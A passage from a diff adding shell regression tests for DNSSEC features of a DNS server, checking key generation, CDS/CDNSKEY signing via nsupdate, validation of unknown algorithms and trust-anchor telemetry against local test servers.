+in="NSEC 8 0 86400 1390003200 1389394800 33655 . NYWjZYBV1b+h4j0yu/SmPOOylR8P4IXKDzHX3NwEmU1SUp27aJ91dP+i+UBcnPmBib0hck4DrFVvpflCEpCnVQd2DexcN0GX+3PM7XobxhtDlmnU X1L47zJlbdHNwTqHuPaMM6Xy9HGMXps7O5JVyfggVhTz2C+G5OVxBdb2rOo="
+
+exp="NSEC 8 0 86400 20140118000000 20140110230000 33655 .
NYWjZYBV1b+h4j0yu/SmPOOylR8P4IXKDzHX3NwEmU1SUp27aJ91dP+i +UBcnPmBib0hck4DrFVvpflCEpCnVQd2DexcN0GX+3PM7XobxhtDlmnU X1L47zJlbdHNwTqHuPaMM6Xy9HGMXps7O5JVyfggVhTz2C+G5OVxBdb2 rOo="
+
+out=$(echo "IN RRSIG $in" | $RRCHECKER -p | sed 's/^IN.RRSIG.//')
+[ "$out" = "$exp" ] || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "check the correct resigning time is reported in zonestatus ($n)"
+ret=0
+rndccmd 10.53.0.3 \
+ zonestatus secure.example > rndc.out.ns3.test$n
+# next resign node: secure.example/DNSKEY
+qname=$(awk '/next resign node:/ { print $4 }' rndc.out.ns3.test$n | sed 's,/.*,,')
+qtype=$(awk '/next resign node:/ { print $4 }' rndc.out.ns3.test$n | sed 's,.*/,,')
+# next resign time: Thu, 24 Apr 2014 10:38:16 GMT
+time=$(awk 'BEGIN { m["Jan"] = "01"; m["Feb"] = "02"; m["Mar"] = "03";
+ m["Apr"] = "04"; m["May"] = "05"; m["Jun"] = "06";
+ m["Jul"] = "07"; m["Aug"] = "08"; m["Sep"] = "09";
+ m["Oct"] = "10"; m["Nov"] = "11"; m["Dec"] = "12";}
+ /next resign time:/ { printf "%d%s%02d%s\n", $7, m[$6], $5, $8 }' rndc.out.ns3.test$n | sed 's/://g')
+dig_with_opts +noall +answer "$qname" "$qtype" @10.53.0.3 > dig.out.test$n
+expire=$(awk '$4 == "RRSIG" { print $9 }' dig.out.test$n)
+inception=$(awk '$4 == "RRSIG" { print $10 }' dig.out.test$n)
+$PERL -e 'exit(0) if ("'"$time"'" lt "'"$expire"'" && "'"$time"'" gt "'"$inception"'"); exit(1);' || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "check that split rrsigs are handled ($n)"
+ret=0
+dig_with_opts split-rrsig soa @10.53.0.7 > dig.out.test$n || ret=1
+awk 'BEGIN { ok=0; } $4 == "SOA" { if ($7 > 1) ok=1; } END { if (!ok) exit(1); }' dig.out.test$n || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "check that not-at-zone-apex RRSIG(SOA) RRsets are removed from the zone after load ($n)"
+ret=0
+dig_with_opts split-rrsig AXFR @10.53.0.7 > dig.out.test$n || ret=1
+grep -q "not-at-zone-apex.*RRSIG.*SOA" dig.out.test$n && ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "check that 'dnssec-keygen -S' works for all supported algorithms ($n)"
+ret=0
+alg=1
+until test $alg -eq 256
+do
+ zone="keygen-$alg."
+ case $alg in
+ 2) # Diffie Helman
+ alg=$((alg+1))
+ continue;;
+ 157|160|161|162|163|164|165) # private - non standard
+ alg=$((alg+1))
+ continue;;
+ 1|5|7|8|10) # RSA algorithms
+ key1=$($KEYGEN -a "$alg" -b "1024" -n zone "$zone" 2> "keygen-$alg.err" || true)
+ ;;
+ 15|16)
+ key1=$($KEYGEN -a "$alg" -n zone "$zone" 2> "keygen-$alg.err" || true)
+ # Soft-fail in case HSM doesn't support Edwards curves
+ if grep "not found" "keygen-$alg.err" > /dev/null && [ "$CRYPTO" = "pkcs11" ]; then
+ echo_i "Algorithm $alg not supported by HSM: skipping"
+ alg=$((alg+1))
+ continue
+ fi
+ ;;
+ *)
+ key1=$($KEYGEN -a "$alg" -n zone "$zone" 2> "keygen-$alg.err" || true)
+ esac
+ if grep "unsupported algorithm" "keygen-$alg.err" > /dev/null
+ then
+ alg=$((alg+1))
+ continue
+ fi
+ if test -z "$key1"
+ then
+ echo_i "'$KEYGEN -a $alg': failed"
+ cat "keygen-$alg.err"
+ ret=1
+ alg=$((alg+1))
+ continue
+ fi
+ $SETTIME -I now+4d "$key1.private" > /dev/null
+ key2=$($KEYGEN -v 10 -i 3d -S "$key1.private" 2> /dev/null)
+ test -f "$key2.key" -a -f "$key2.private" || {
+ ret=1
+ echo_i "'dnssec-keygen -S' failed for algorithm: $alg"
+ }
+ alg=$((alg+1))
+done
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "check that CDS records are signed using KSK by dnssec-signzone ($n)"
+ret=0
+dig_with_opts +noall +answer @10.53.0.2 cds cds.secure > dig.out.test$n
+lines=$(awk '$4 == "RRSIG" && $5 == "CDS" {print}' dig.out.test$n | wc -l)
+test "$lines" -eq 2 || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "check that CDS records are not signed using ZSK by dnssec-signzone -x ($n)"
+ret=0
+dig_with_opts +noall +answer @10.53.0.2 cds
cds-x.secure > dig.out.test$n
+lines=$(awk '$4 == "RRSIG" && $5 == "CDS" {print}' dig.out.test$n | wc -l)
+test "$lines" -eq 2 || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking that positive unknown NSEC3 hash algorithm does validate ($n)"
+ret=0
+dig_with_opts +noauth +noadd +nodnssec +adflag @10.53.0.3 nsec3-unknown.example SOA > dig.out.ns3.test$n
+dig_with_opts +noauth +noadd +nodnssec +adflag @10.53.0.4 nsec3-unknown.example SOA > dig.out.ns4.test$n
+grep "status: NOERROR," dig.out.ns3.test$n > /dev/null || ret=1
+grep "status: NOERROR," dig.out.ns4.test$n > /dev/null || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1
+grep "ANSWER: 1," dig.out.ns4.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "check that CDS records are signed using KSK by with dnssec-auto ($n)"
+ret=0
+dig_with_opts +noall +answer @10.53.0.2 cds cds-auto.secure > dig.out.test$n
+lines=$(awk '$4 == "RRSIG" && $5 == "CDS" {print}' dig.out.test$n | wc -l)
+test "$lines" -eq 2 || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "check that a CDS deletion record is accepted ($n)"
+ret=0
+(
+echo zone cds-update.secure
+echo server 10.53.0.2 "$PORT"
+echo update delete cds-update.secure CDS
+echo update add cds-update.secure 0 CDS 0 0 0 00
+echo send
+) | $NSUPDATE > nsupdate.out.test$n 2>&1
+dig_with_opts +noall +answer @10.53.0.2 cds cds-update.secure > dig.out.test$n
+lines=$(awk '$4 == "CDS" {print}' dig.out.test$n | wc -l)
+test "${lines:-10}" -eq 1 || ret=1
+lines=$(tr -d '\r' < dig.out.test$n | awk '$4 == "CDS" && $5 == "0" && $6 == "0" && $7 == "0" && $8 == "00" {print}' | wc -l)
+test "$lines" -eq 1 || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "check that CDS records are signed using KSK when added by nsupdate ($n)"
+ret=0
+(
+echo zone cds-update.secure
+echo
server 10.53.0.2 "$PORT"
+echo update delete cds-update.secure CDS
+echo send
+dig_with_opts +noall +answer @10.53.0.2 dnskey cds-update.secure |
+grep "DNSKEY.257" |
+$DSFROMKEY -12 -C -f - -T 1 cds-update.secure |
+sed "s/^/update add /"
+echo send
+) | $NSUPDATE
+dig_with_opts +noall +answer @10.53.0.2 cds cds-update.secure > dig.out.test$n
+lines=$(awk '$4 == "RRSIG" && $5 == "CDS" {print}' dig.out.test$n | wc -l)
+test "$lines" -eq 2 || ret=1
+lines=$(awk '$4 == "CDS" {print}' dig.out.test$n | wc -l)
+test "$lines" -eq 2 || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "check that CDS records are signed only using KSK when added by"
+echo_ic "nsupdate when dnssec-dnskey-kskonly is yes ($n)"
+ret=0
+keyid=$(cat ns2/cds-kskonly.secure.id)
+(
+echo zone cds-kskonly.secure
+echo server 10.53.0.2 "$PORT"
+echo update delete cds-kskonly.secure CDS
+echo send
+dig_with_opts +noall +answer @10.53.0.2 dnskey cds-kskonly.secure |
+grep "DNSKEY.257" |
+$DSFROMKEY -12 -C -f - -T 1 cds-kskonly.secure |
+sed "s/^/update add /"
+echo send
+) | $NSUPDATE
+dig_with_opts +noall +answer @10.53.0.2 cds cds-kskonly.secure > dig.out.test$n
+lines=$(awk '$4 == "RRSIG" && $5 == "CDS" {print}' dig.out.test$n | wc -l)
+test "$lines" -eq 1 || ret=1
+lines=$(awk -v id="${keyid}" '$4 == "RRSIG" && $5 == "CDS" && $11 == id {print}' dig.out.test$n | wc -l)
+test "$lines" -eq 1 || ret=1
+lines=$(awk '$4 == "CDS" {print}' dig.out.test$n | wc -l)
+test "$lines" -eq 2 || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "check that CDS deletion records are signed only using KSK when added by"
+echo_ic "nsupdate when dnssec-dnskey-kskonly is yes ($n)"
+ret=0
+keyid=$(cat ns2/cds-kskonly.secure.id)
+(
+echo zone cds-kskonly.secure
+echo server 10.53.0.2 "$PORT"
+echo update delete cds-kskonly.secure CDS
+echo update add cds-kskonly.secure 0 CDS 0 0 0 00
+echo send
+) | $NSUPDATE
+dig_with_opts +noall +answer
@10.53.0.2 cds cds-kskonly.secure > dig.out.test$n
+lines=$(awk '$4 == "RRSIG" && $5 == "CDS" {print}' dig.out.test$n | wc -l)
+test "$lines" -eq 1 || ret=1
+lines=$(awk -v id="${keyid}" '$4 == "RRSIG" && $5 == "CDS" && $11 == id {print}' dig.out.test$n | wc -l)
+test "$lines" -eq 1 || ret=1
+lines=$(awk '$4 == "CDS" {print}' dig.out.test$n | wc -l)
+test "$lines" -eq 1 || ret=1
+lines=$(tr -d '\r' < dig.out.test$n | awk '$4 == "CDS" && $5 == "0" && $6 == "0" && $7 == "0" && $8 == "00" {print}' | wc -l)
+test "$lines" -eq 1 || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking that positive unknown NSEC3 hash algorithm with OPTOUT does validate ($n)"
+ret=0
+dig_with_opts +noauth +noadd +nodnssec +adflag @10.53.0.3 optout-unknown.example SOA > dig.out.ns3.test$n
+dig_with_opts +noauth +noadd +nodnssec +adflag @10.53.0.4 optout-unknown.example SOA > dig.out.ns4.test$n
+grep "status: NOERROR," dig.out.ns3.test$n > /dev/null || ret=1
+grep "status: NOERROR," dig.out.ns4.test$n > /dev/null || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1
+grep "ANSWER: 1," dig.out.ns4.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "check that a non matching CDS record is accepted with a matching CDS record ($n)"
+ret=0
+(
+echo zone cds-update.secure
+echo server 10.53.0.2 "$PORT"
+echo update delete cds-update.secure CDS
+echo send
+dig_with_opts +noall +answer @10.53.0.2 dnskey cds-update.secure |
+grep "DNSKEY.257" |
+$DSFROMKEY -12 -C -f - -T 1 cds-update.secure |
+sed "s/^/update add /"
+dig_with_opts +noall +answer @10.53.0.2 dnskey cds-update.secure |
+grep "DNSKEY.257" | sed 's/DNSKEY.257/DNSKEY 258/' |
+$DSFROMKEY -12 -C -A -f - -T 1 cds-update.secure |
+sed "s/^/update add /"
+echo send
+) | $NSUPDATE
+dig_with_opts +noall +answer @10.53.0.2 cds cds-update.secure > dig.out.test$n
+lines=$(awk '$4 == "RRSIG" && $5 == "CDS" {print}'
dig.out.test$n | wc -l)
+test "$lines" -eq 2 || ret=1
+lines=$(awk '$4 == "CDS" {print}' dig.out.test$n | wc -l)
+test "$lines" -eq 4 || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking that negative unknown NSEC3 hash algorithm does not validate ($n)"
+ret=0
+dig_with_opts +noauth +noadd +nodnssec +adflag @10.53.0.3 nsec3-unknown.example A > dig.out.ns3.test$n
+dig_with_opts +noauth +noadd +nodnssec +adflag @10.53.0.4 nsec3-unknown.example A > dig.out.ns4.test$n
+grep "status: NOERROR," dig.out.ns3.test$n > /dev/null || ret=1
+grep "status: SERVFAIL," dig.out.ns4.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "check that CDNSKEY records are signed using KSK by dnssec-signzone ($n)"
+ret=0
+dig_with_opts +noall +answer @10.53.0.2 cdnskey cdnskey.secure > dig.out.test$n
+lines=$(awk '$4 == "RRSIG" && $5 == "CDNSKEY" {print}' dig.out.test$n | wc -l)
+test "$lines" -eq 2 || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "check that CDNSKEY records are not signed using ZSK by dnssec-signzone -x ($n)"
+ret=0
+dig_with_opts +noall +answer @10.53.0.2 cdnskey cdnskey-x.secure > dig.out.test$n
+lines=$(awk '$4 == "RRSIG" && $5 == "CDNSKEY" {print}' dig.out.test$n | wc -l)
+test "$lines" -eq 2 || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking that negative unknown NSEC3 hash algorithm with OPTOUT does not validate ($n)"
+ret=0
+dig_with_opts +noauth +noadd +nodnssec +adflag @10.53.0.3 optout-unknown.example A > dig.out.ns3.test$n
+dig_with_opts +noauth +noadd +nodnssec +adflag @10.53.0.4 optout-unknown.example A > dig.out.ns4.test$n
+grep "status: NOERROR," dig.out.ns3.test$n > /dev/null || ret=1
+grep "status: SERVFAIL," dig.out.ns4.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "check that CDNSKEY
records are signed using KSK by with dnssec-auto ($n)"
+ret=0
+dig_with_opts +noall +answer @10.53.0.2 cdnskey cdnskey-auto.secure > dig.out.test$n
+lines=$(awk '$4 == "RRSIG" && $5 == "CDNSKEY" {print}' dig.out.test$n | wc -l)
+test "$lines" -eq 2 || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking that unknown DNSKEY algorithm validates as insecure ($n)"
+ret=0
+dig_with_opts +noauth +noadd +nodnssec +adflag @10.53.0.3 dnskey-unknown.example A > dig.out.ns3.test$n
+dig_with_opts +noauth +noadd +nodnssec +adflag @10.53.0.4 dnskey-unknown.example A > dig.out.ns4.test$n
+grep "status: NOERROR," dig.out.ns3.test$n > /dev/null || ret=1
+grep "status: NOERROR," dig.out.ns4.test$n > /dev/null || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null && ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking that unsupported DNSKEY algorithm validates as insecure ($n)"
+ret=0
+dig_with_opts +noauth +noadd +nodnssec +adflag @10.53.0.3 dnskey-unsupported.example A > dig.out.ns3.test$n
+dig_with_opts +noauth +noadd +nodnssec +adflag @10.53.0.4 dnskey-unsupported.example A > dig.out.ns4.test$n
+grep "status: NOERROR," dig.out.ns3.test$n > /dev/null || ret=1
+grep "status: NOERROR," dig.out.ns4.test$n > /dev/null || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null && ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking that unsupported DNSKEY algorithm is in DNSKEY RRset ($n)"
+ret=0
+dig_with_opts +noauth +noadd +nodnssec +adflag @10.53.0.3 dnskey-unsupported-2.example DNSKEY > dig.out.test$n
+grep "status: NOERROR," dig.out.test$n > /dev/null || ret=1
+grep "dnskey-unsupported-2\.example\..*IN.*DNSKEY.*257 3 255" dig.out.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+# TODO: test case for GL #1689.
+# If we allow the dnssec tools to use deprecated algorithms (such as RSAMD5)
+# we could write a test that signs a zone with supported and unsupported
+# algorithm, apply a fixed rrset order such that the unsupported algorithm
+# precedes the supported one in the DNSKEY RRset, and verify the result still
+# validates succesfully.
+
+echo_i "check that a CDNSKEY deletion record is accepted ($n)"
+ret=0
+(
+echo zone cdnskey-update.secure
+echo server 10.53.0.2 "$PORT"
+echo update delete cdnskey-update.secure CDNSKEY
+echo update add cdnskey-update.secure 0 CDNSKEY 0 3 0 AA==
+echo send
+) | $NSUPDATE > nsupdate.out.test$n 2>&1
+dig_with_opts +noall +answer @10.53.0.2 cdnskey cdnskey-update.secure > dig.out.test$n
+lines=$(awk '$4 == "CDNSKEY" {print}' dig.out.test$n | wc -l)
+test "${lines:-10}" -eq 1 || ret=1
+lines=$(tr -d '\r' < dig.out.test$n | awk '$4 == "CDNSKEY" && $5 == "0" && $6 == "3" && $7 == "0" && $8 == "AA==" {print}' | wc -l)
+test "${lines:-10}" -eq 1 || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking that unknown DNSKEY algorithm + unknown NSEC3 has algorithm validates as insecure ($n)"
+ret=0
+dig_with_opts +noauth +noadd +nodnssec +adflag @10.53.0.3 dnskey-nsec3-unknown.example A > dig.out.ns3.test$n
+dig_with_opts +noauth +noadd +nodnssec +adflag @10.53.0.4 dnskey-nsec3-unknown.example A > dig.out.ns4.test$n
+grep "status: NOERROR," dig.out.ns3.test$n > /dev/null || ret=1
+grep "status: NOERROR," dig.out.ns4.test$n > /dev/null || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null && ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "check that CDNSKEY records are signed using KSK when added by nsupdate ($n)"
+ret=0
+(
+echo zone cdnskey-update.secure
+echo server 10.53.0.2 "$PORT"
+echo update delete cdnskey-update.secure CDNSKEY
+dig_with_opts +noall +answer @10.53.0.2 dnskey cdnskey-update.secure |
+sed -n -e "s/^/update add /" -e
's/DNSKEY.257/CDNSKEY 257/p'
+echo send
+) | $NSUPDATE
+dig_with_opts +noall +answer @10.53.0.2 cdnskey cdnskey-update.secure > dig.out.test$n
+lines=$(awk '$4 == "RRSIG" && $5 == "CDNSKEY" {print}' dig.out.test$n | wc -l)
+test "$lines" -eq 2 || ret=1
+lines=$(awk '$4 == "CDNSKEY" {print}' dig.out.test$n | wc -l)
+test "$lines" -eq 1 || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "check that CDNSKEY records are signed only using KSK when added by"
+echo_ic "nsupdate when dnssec-dnskey-kskonly is yes ($n)"
+ret=0
+keyid=$(cat ns2/cdnskey-kskonly.secure.id)
+(
+echo zone cdnskey-kskonly.secure
+echo server 10.53.0.2 "$PORT"
+echo update delete cdnskey-kskonly.secure CDNSKEY
+dig_with_opts +noall +answer @10.53.0.2 dnskey cdnskey-kskonly.secure |
+sed -n -e "s/^/update add /" -e 's/DNSKEY.257/CDNSKEY 257/p'
+echo send
+) | $NSUPDATE
+dig_with_opts +noall +answer @10.53.0.2 cdnskey cdnskey-kskonly.secure > dig.out.test$n
+lines=$(awk '$4 == "RRSIG" && $5 == "CDNSKEY" {print}' dig.out.test$n | wc -l)
+test "$lines" -eq 1 || ret=1
+lines=$(awk -v id="${keyid}" '$4 == "RRSIG" && $5 == "CDNSKEY" && $11 == id {print}' dig.out.test$n | wc -l)
+test "$lines" -eq 1 || ret=1
+lines=$(awk '$4 == "CDNSKEY" {print}' dig.out.test$n | wc -l)
+test "$lines" -eq 1 || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "check that CDNSKEY deletion records are signed only using KSK when added by"
+echo_ic "nsupdate when dnssec-dnskey-kskonly is yes ($n)"
+ret=0
+keyid=$(cat ns2/cdnskey-kskonly.secure.id)
+(
+echo zone cdnskey-kskonly.secure
+echo server 10.53.0.2 "$PORT"
+echo update delete cdnskey-kskonly.secure CDNSKEY
+echo update add cdnskey-kskonly.secure 0 CDNSKEY 0 3 0 AA==
+echo send
+) | $NSUPDATE
+dig_with_opts +noall +answer @10.53.0.2 cdnskey cdnskey-kskonly.secure > dig.out.test$n
+lines=$(awk '$4 == "RRSIG" && $5 == "CDNSKEY" {print}' dig.out.test$n | wc -l)
+test "$lines" -eq 1 || ret=1
+lines=$(awk -v id="${keyid}" '$4 == "RRSIG" && $5 == "CDNSKEY" && $11 == id {print}' dig.out.test$n | wc -l)
+test "$lines" -eq 1 || ret=1
+lines=$(awk '$4 == "CDNSKEY" {print}' dig.out.test$n | wc -l)
+test "$lines" -eq 1 || ret=1
+lines=$(tr -d '\r' < dig.out.test$n | awk '$4 == "CDNSKEY" && $5 == "0" && $6 == "3" && $7 == "0" && $8 == "AA==" {print}' | wc -l)
+test "${lines:-10}" -eq 1 || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking initialization with a revoked managed key ($n)"
+ret=0
+copy_setports ns5/named2.conf.in ns5/named.conf
+rndccmd 10.53.0.5 reconfig 2>&1 | sed 's/^/ns5 /' | cat_i
+sleep 3
+dig_with_opts +dnssec @10.53.0.5 SOA . > dig.out.ns5.test$n
+grep "status: SERVFAIL" dig.out.ns5.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "check that a non matching CDNSKEY record is accepted with a matching CDNSKEY record ($n)"
+ret=0
+(
+echo zone cdnskey-update.secure
+echo server 10.53.0.2 "$PORT"
+echo update delete cdnskey-update.secure CDNSKEY
+dig_with_opts +noall +answer @10.53.0.2 dnskey cdnskey-update.secure |
+sed -n -e "s/^/update add /" -e 's/DNSKEY.257/CDNSKEY 257/p'
+dig_with_opts +noall +answer @10.53.0.2 dnskey cdnskey-update.secure |
+sed -n -e "s/^/update add /" -e 's/DNSKEY.257/CDNSKEY 258/p'
+echo send
+) | $NSUPDATE
+dig_with_opts +noall +answer @10.53.0.2 cdnskey cdnskey-update.secure > dig.out.test$n
+lines=$(awk '$4 == "RRSIG" && $5 == "CDNSKEY" {print}' dig.out.test$n | wc -l)
+test "$lines" -eq 2 || ret=1
+lines=$(awk '$4 == "CDNSKEY" {print}' dig.out.test$n | wc -l)
+test "$lines" -eq 2 || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "check that RRSIGs are correctly removed from apex when RRset is removed NSEC ($n)"
+ret=0
+# generate signed zone with MX and AAAA records at apex.
+(
+cd signer || exit 1
+$KEYGEN -q -a $DEFAULT_ALGORITHM -3 -fK remove > /dev/null
+$KEYGEN -q -a $DEFAULT_ALGORITHM -33 remove > /dev/null
+echo > remove.db.signed
+$SIGNER -S -o remove -D -f remove.db.signed remove.db.in > signer.out.1.$n
+)
+grep "RRSIG MX" signer/remove.db.signed > /dev/null || {
+ ret=1 ; cp signer/remove.db.signed signer/remove.db.signed.pre$n;
+}
+# re-generate signed zone without MX and AAAA records at apex.
+(
+cd signer || exit 1
+$SIGNER -S -o remove -D -f remove.db.signed remove2.db.in > signer.out.2.$n
+)
+grep "RRSIG MX" signer/remove.db.signed > /dev/null && {
+ ret=1 ; cp signer/remove.db.signed signer/remove.db.signed.post$n;
+}
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "check that RRSIGs are correctly removed from apex when RRset is removed NSEC3 ($n)"
+ret=0
+# generate signed zone with MX and AAAA records at apex.
+(
+cd signer || exit 1
+echo > remove.db.signed
+$SIGNER -3 - -S -o remove -D -f remove.db.signed remove.db.in > signer.out.1.$n
+)
+grep "RRSIG MX" signer/remove.db.signed > /dev/null || {
+ ret=1 ; cp signer/remove.db.signed signer/remove.db.signed.pre$n;
+}
+# re-generate signed zone without MX and AAAA records at apex.
+(
+cd signer || exit 1
+$SIGNER -3 - -S -o remove -D -f remove.db.signed remove2.db.in > signer.out.2.$n
+)
+grep "RRSIG MX" signer/remove.db.signed > /dev/null && {
+ ret=1 ; cp signer/remove.db.signed signer/remove.db.signed.post$n;
+}
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "check that a named managed zone that was signed 'in-the-future' is re-signed when loaded ($n)"
+ret=0
+dig_with_opts managed-future.example.
@10.53.0.4 a > dig.out.ns4.test$n || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1
+grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "check that trust-anchor-telemetry queries are logged ($n)"
+ret=0
+grep "sending trust-anchor-telemetry query '_ta-[0-9a-f]*/NULL" ns6/named.run > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "check that _ta-XXXX trust-anchor-telemetry queries are logged ($n)"
+ret=0
+grep "trust-anchor-telemetry '_ta-[0-9a-f]*/IN' from" ns1/named.run > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "check that _ta-AAAA trust-anchor-telemetry are not sent when disabled ($n)"
+ret=0
+grep "sending trust-anchor-telemetry query '_ta-[0-9a-f]*/IN" ns1/named.run > /dev/null && ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "check that KEY-TAG trust-anchor-telemetry queries are logged ($n)"
+ret=0
+dig_with_opts . dnskey +ednsopt=KEY-TAG:ffff @10.53.0.1 > dig.out.ns1.test$n || ret=1
+grep "trust-anchor-telemetry './IN' from .* 65535" ns1/named.run > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "check that multiple KEY-TAG trust-anchor-telemetry options don't leak memory ($n)"
+ret=0
+dig_with_opts .
dnskey +ednsopt=KEY-TAG:fffe +ednsopt=KEY-TAG:fffd @10.53.0.1 > dig.out.ns1.test$n || ret=1
+grep "trust-anchor-telemetry './IN' from .* 65534" ns1/named.run > /dev/null || ret=1
+grep "trust-anchor-telemetry './IN' from .* 65533" ns1/named.run > /dev/null && ret=1
+stop_server ns1 || ret=1
+nextpart ns1/named.run > /dev/null
+start_server --noclean --restart --port ${PORT} ns1 || ret=1
+n=$(($n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "waiting for root server to finish reloading ($n)"
+ret=0
+wait_for_log 20 "all zones loaded" ns1/named.run || ret=1
+n=$(($n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "check that the view is logged in messages from the validator when using views ($n)"
+ret=0
+grep "view rec: *validat" ns4/named.run > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "check that DNAME at apex with NSEC3 is correctly signed (dnssec-signzone) ($n)"
+ret=0
+dig_with_opts txt dname-at-apex-nsec3.example @10.53.0.3 > dig.out.ns3.test$n || ret=1
+grep "RRSIG.NSEC3 $DEFAULT_ALGORITHM_NUMBER 3 600" dig.out.ns3.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "check that DNSKEY and other occluded data are excluded from the delegating bitmap ($n)"
+ret=0
+dig_with_opts axfr occluded.example @10.53.0.3 > dig.out.ns3.test$n || ret=1
+grep "^delegation.occluded.example..*NSEC.*NS KEY DS RRSIG NSEC$" dig.out.ns3.test$n > /dev/null || ret=1
+grep "^delegation.occluded.example..*DNSKEY.*" dig.out.ns3.test$n > /dev/null || ret=1
+grep "^delegation.occluded.example..*AAAA.*" dig.out.ns3.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking DNSSEC records are occluded from ANY in an insecure zone ($n)"
+ret=0
+dig_with_opts any x.insecure.example.
@10.53.0.3 > dig.out.ns3.1.test$n || ret=1
+grep "status: NOERROR" dig.out.ns3.1.test$n > /dev/null || ret=1
+grep "ANSWER: 0," dig.out.ns3.1.test$n > /dev/null || ret=1
+dig_with_opts any zz.secure.example. @10.53.0.3 > dig.out.ns3.2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns3.2.test$n > /dev/null || ret=1
+# DNSKEY+RRSIG, NSEC+RRSIG
+grep "ANSWER: 4," dig.out.ns3.2.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+#
+# DNSSEC tests related to unsupported, disabled and revoked trust anchors.
+#
+
+# This nameserver (ns8) is loaded with a bunch of trust anchors. Some of
+# them are good (enabled.managed, enabled.trusted, secure.managed,
+# secure.trusted), and some of them are bad (disabled.managed,
